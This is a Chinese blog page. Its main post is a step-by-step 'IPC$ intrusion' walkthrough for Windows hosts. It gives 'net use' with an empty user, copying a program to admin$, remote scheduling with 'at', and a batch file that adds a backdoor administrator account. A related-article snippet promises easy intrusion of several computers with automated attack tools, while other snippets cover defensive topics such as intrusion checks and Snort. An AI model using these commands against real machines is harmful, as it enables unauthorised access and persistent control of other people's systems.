IPC$入侵--个人练习

前提:1.远程主机防火墙关闭

2.远程主机开启了IPC共享(开启了139端口)

步骤:1.net use \\10.10.10.9\IPC$ "密码" /user:""

2.copy 本地文件 \\10.10.10.9\admin$

3.net time \\10.10.10.9 (查看远程主机时间)

4.at \\10.10.10.9 时间 "本地文件路径"

5.以上为在远程主机定时执行某个程序

6.可以制作一个userAdd.bat:

net user aaa /add

net localgroup administrators aaa /add

这样以后可以用aaa访问此远程主机了。

7.net start 服务名  开启想要的服务。

				
时间: 2024-10-01 02:25:33

IPC$入侵--个人练习的相关文章

傻瓜级入侵

1,傻瓜级入侵(不是骂你们哦 比喻下而已) 之所以说这是傻瓜级,因为这个方法完全不用动脑子,并且保守的说,照这个方法,两个小时内肯定至少能入侵3台电脑!3台绝对是保守的数目! 需要软件:WinntAutoAttack (版本:V2.0) Remote Administrator v2.0(简称RA) 3389登陆器(xp自带的有,要是xp,就不要下载了,就是\"开始\"-\"所有程序\"-\"附件\"-\"通讯\"-\&quo

排查Linux机器是否已经被入侵

随着开源产品的越来越盛行,作为一个Linux运维工程师,能够清晰地鉴别异常机器是否已经被入侵了显得至关重要,个人结合自己的工作经历,整理了几种常见的机器被黑情况供参考 背景信息:以下情况是在CentOS 6.9的系统中查看的,其它Linux发行版类似 1.入侵者可能会删除机器的日志信息,可以查看日志信息是否还存在或者是否被清空,相关命令示例: [[email protected] ~]# ll -h /var/log/* -rw-------. 1 root root 2.6K Jul 7 18

网络入侵检测

netstat -anlp | grep 80 | grep tcp | awk '{print $5}' | awk -F: '{print $1}' |sort | uniq -c | sort -nr | head -n20 netstat -ant | awk '/:80/{split($5,ip,":");++A[ip[1]]} END {for(i in A) print A[i],i}'  | sort -rn | head -n 20 tcpdump -i eth0 -

  挖矿程序minerd,wnTKYg入侵分析和解决

挖矿程序minerd,wnTKYg入侵分析和解决                                   作者:CYH 一.起因:最近登陆一台redis服务器 发现登陆的时间非常长,而且各种命令敲大显示出的内容延迟很高 二,分析:  首先我安装了iftop监控em1这个网卡流量 Iftop -i  em1 发现里面的流量使用很低,没多少服务使用大的流量,没占用带宽,排除了ddos大流量攻击可能 接着我输入命令top 查看各种负载,一看吓一跳,cpu平均负载达到70左右,使用率达到99

企业Shell面试题14:开发脚本入侵检测与报警案例

面试及实战考试题:监控web站点目录(/var/html/www)下所有文件是否被恶意篡改(文件内容被改了),如果有就打印改动的文件名(发邮件),定时任务每3分钟执行一次. 1.1问题分析 1)首先要说明的是,思考过程的积累比实际代码开发的能力积累更重要. 2)什么是恶意篡改,只要是未经过许可的改动都是篡改. 3)文件内容被改动了会有如下特征. ◎ 大小可能会变化 ◎ 修改时间会变化 ◎ 文件内容会变化,利用md5sum指纹校验 ◎ 增加或删除文件,比对每次检测前后的文件数量. 1.2参考解答

网上常见入侵的六种途径

你作为一个精明的电脑用户,除了必须了解各种恶意软件的入侵途径外,还需对其常见的入侵加以防御,才可保护电脑及财产的安全.下面来看看网上常见入侵的几种途径. 一.通过通讯软件感染病毒 近几年来,通过QQ.Yahoo! Messenger.Window等通讯软件传播病毒速率,成急剧增加的趋势.那究竟什么原因导致这个现象产生呢?其实答案很简单,就是IM软件支持了查看脱机信息. 在程序的主界面内,依次单击上方"工具"→"选项",在弹出的"选项"对话框内,选

Linux后门入侵检测工具,附bash漏洞解决方法[转载]

转自:http://blog.jobbole.com/77663/ 官网 ClamAV杀毒软件介绍 ClamAV是一个在命令行下查毒软件,因为它不将杀毒作为主要功能,默认只能查出您计算机内的病毒,但是无法清除,至多删除文件.ClamAV可以工作很多的平台上,但是有少数无法支持,这就要取决您所使用的平台的流行程度了.另外它主要是来防护一些WINDOWS病毒和木马程序.另外,这是一个面向服务端的软件. 下载ClamAV安装包 ClamAV的官方下载地址为http://www.clamav.net/d

web安全-入侵基础

注:需先了解HTTP请求头的含义. 在:HTTP 协议详解 中 WEB应用:通过超文本传输协议HTTP访问的应用. 一.Web应用入侵 3种入侵方法: a.通过图形化Web界面直接操纵应用. b.篡改统一资源标识符(URI). c.篡改没有包含在URI中的HTTP元素. 二.GUI Web入侵 即在web浏览页面中直接操作,如在用户名框中直接输入 :'OR 1=1-- 三.URI 入侵 RFC3986描述了URI(及其子集,包括更常用的术语统一资源定位符(URL))的结构和语法. 其中URI 如

入侵检测

入侵检测(Intrusion Detection),顾名思义,就是对入侵行为的发觉.他通过对计算机网络或计算机系统中若干关键点收集信息并对其进行分析,从中发现网络或系统中是否有违反安全策略的行为和被攻击的迹象.入侵检测是防火墙的合理补充. 入侵检测系统所采用的技术可分为特征检测与异常检测两种: 特征检测: 特征检测(Signature-based detection) 又称Misuse detection ,这一检测假设入侵者活动可以用一种模式来表示,系统的目标是检测主体活动是否符合这些模式.它

搭建开源入侵检测系统Snort并实现与防火墙联动

Snort作为一款优秀的开源主机入侵检测系统,在windows和Linux平台上均可安装运行.BT5作为曾经的一款经典的渗透神器,基于 Ubuntu,里面已经预装很多的应用,比如Mysql.Apache.Snort等等.Guardian是snort的插件,通过读取snort报警日 志将入侵IP加入到Iptables中.Iptables 是与最新的 3.5 版本 Linux 内核集成的 IP 信息包过滤系统. 本文详细介绍了BT5中安装snrot NIDS并实现与iptables防火墙联动的过程.